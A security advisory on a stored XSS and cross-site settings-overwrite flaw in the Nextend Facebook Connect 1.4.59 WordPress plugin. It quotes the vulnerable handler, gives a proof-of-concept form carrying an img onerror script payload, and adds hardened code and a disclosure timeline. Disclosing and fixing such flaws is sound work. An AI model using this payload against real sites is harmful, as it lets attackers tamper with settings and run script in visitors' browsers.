24-11-2014 / Vulnerabilities

Nextend Facebook Connect 1.4.59 XSS

Anyone can change plugin settings: the settings handler below checks neither the caller's capability nor a nonce, so an unauthenticated POST (including one submitted cross-site from an attacker's page) overwrites the plugin's options with arbitrary values. The stored fb_login_button value is later rendered on the login page, which turns the missing check into stored XSS.

File: nextend-facebook-connect\nextend-facebook-settings.php

if(isset($_POST['newfb_update_options'])) {
	if($_POST['newfb_update_options'] == 'Y') {
		foreach($_POST AS $k => $v){
			$_POST[$k] = stripslashes($v);
		}
		update_option("nextend_fb_connect", maybe_serialize($_POST));
		$newfb_status = 'update_success';
	}
}

Proof of Concept

<form method="post" action="http://wordpress-instalation">
    <input type="hidden" name="newfb_update_options" value="Y">
    XSS: <textarea name="fb_login_button" rows="10" cols="40">&lt;img src=x onerror=alert(String.fromCharCode(88,83,83))&gt;</textarea>
    <input type="submit" value="Hack!">
</form>

The stored payload is rendered, and the XSS fires, on the login page:

http://wordpress-instalation/wp-login.php
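For comparison, the same settings handler rewritten with the checks the vulnerable version lacks. This is an added example, not the plugin's own code and not the vendor's 1.5.1 fix; the capability name, the nonce action and field name, and the allow-list of option keys are assumptions.

```php
<?php
// Added example: a hardened version of the settings handler quoted above.
// Assumed: 'manage_options' capability, nonce action 'newfb_update_options',
// nonce field 'newfb_nonce', and the option keys listed in $allowed.

function newfb_handle_settings_update() {
    if (!isset($_POST['newfb_update_options']) || $_POST['newfb_update_options'] !== 'Y') {
        return null;
    }
    // 1. Only users allowed to manage options may change plugin settings.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', '', array('response' => 403));
    }
    // 2. The request must carry a valid nonce, which defeats a cross-site
    //    form post like the one in the proof of concept.
    check_admin_referer('newfb_update_options', 'newfb_nonce');

    // 3. Persist only expected keys, each run through a sanitizer,
    //    instead of serializing the whole $_POST array.
    $allowed = array(
        'fb_appid'        => 'sanitize_text_field',   // assumed key
        'fb_secret'       => 'sanitize_text_field',   // assumed key
        'fb_login_button' => 'wp_kses_post',          // limited HTML, no event handlers
    );
    $options = array();
    foreach ($allowed as $key => $sanitizer) {
        if (isset($_POST[$key])) {
            $options[$key] = call_user_func($sanitizer, wp_unslash($_POST[$key]));
        }
    }
    update_option('nextend_fb_connect', $options);
    return 'update_success';
}

// The settings form must emit the matching nonce field for step 2 to pass.
function newfb_settings_form_fields() {
    echo '<input type="hidden" name="newfb_update_options" value="Y">';
    wp_nonce_field('newfb_update_options', 'newfb_nonce');
}

// Output side: filter the stored markup again at render time, so a value that
// reached the database by another path still cannot run script on wp-login.php.
function newfb_render_login_button() {
    $options = get_option('nextend_fb_connect', array());
    $button  = isset($options['fb_login_button']) ? $options['fb_login_button'] : '';
    echo wp_kses_post($button);
}
```

With these checks in place the advisory's form is rejected at the capability check for anonymous visitors and at the nonce check for a logged-in administrator lured to the attacker's page, and wp_kses_post strips the onerror handler from anything that is accepted.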

Timeline

  • 16-10-2014: Discovered
  • 06-11-2014: Vendor notified
  • 18-11-2014: Second notification
  • 21-11-2014: Version 1.5.1 released, issue resolved